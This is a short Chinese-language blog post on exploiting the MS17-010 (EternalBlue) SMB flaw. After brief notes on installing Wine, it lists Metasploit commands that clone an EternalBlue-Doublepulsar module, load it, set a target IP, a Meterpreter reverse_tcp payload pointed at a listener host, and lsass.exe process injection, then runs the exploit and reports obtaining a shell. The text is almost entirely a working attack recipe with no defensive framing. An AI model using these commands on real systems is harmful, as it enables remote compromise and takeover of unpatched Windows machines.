ms17-010

使用wine可以在linux下運行windows程序。

root@ubuntu:~# apt-get install wine ?安裝wine

coler@ubuntu:~/Desktop$ wine cmd.exe ?打開cmd.exe

coler@ubuntu:~/Desktop$ wine TeamViewer.exe? 打開TeamViewer

下面是漏洞利用過程:

root@kali:~# git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

root@kali:~# cp Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ ?將漏洞利用代碼拷貝到msf的exploit模塊中

msf > reload_all ?重新加載所有模塊

msf > use exploit/windows/smb/eternalblue_doublepulsar

msf exploit(eternalblue_doublepulsar) > set rhost 192.168.80.33

msf exploit(eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp

msf exploit(eternalblue_doublepulsar) > set lhost 192.168.80.163

msf exploit(eternalblue_doublepulsar) > set processinject lsass.exe

msf exploit(eternalblue_doublepulsar) > set target 9

msf exploit(eternalblue_doublepulsar) > exploit

成功獲得shell
最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容